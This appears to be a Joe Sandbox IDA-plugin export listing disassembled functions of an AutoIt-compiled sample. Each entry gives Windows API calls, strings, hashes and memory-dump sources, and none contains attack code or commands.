                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                    • API String ID: 790654849-32604322
                                                                                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                    Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                                    • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                                    Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 2353593579-4108050209
                                                                                                                    • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                    • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                                    • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                                    • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                                    Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                                    • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                                    • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                                    • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1744303182-0
                                                                                                                    • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                    • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                                    • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                                    • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                                    Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                                    • __mtterm.LIBCMT ref: 00417C34
                                                                                                                      • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                                      • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                                      • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                                    • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                                    • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                                    • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                    • API String ID: 4163708885-3819984048
                                                                                                                    • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                    • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                    • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                    • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                    Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                    • API String ID: 0-1896584978
                                                                                                                    • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                    • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                                    Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicoll$IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2485277191-404129466
                                                                                                                    • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                    • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                    • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                    • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                    Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                    • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                    • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3869813825-0
                                                                                                                    • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                    • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                    • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                    • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                    Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00464B28
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                    • _wcslen.LIBCMT ref: 00464C28
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                    • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                    • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                    • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 1914653954-2746444292
                                                                                                                    • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                    • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                    • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                    • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                    Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                    • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                    • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                    • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                    • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1153243558-438819550
                                                                                                                    • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                    • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                    • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                    • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                    Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicoll
                                                                                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                    • API String ID: 3832890014-4202584635
                                                                                                                    • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                    • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                    • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                    • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                    Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                    • GetFocus.USER32 ref: 0046A0DD
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
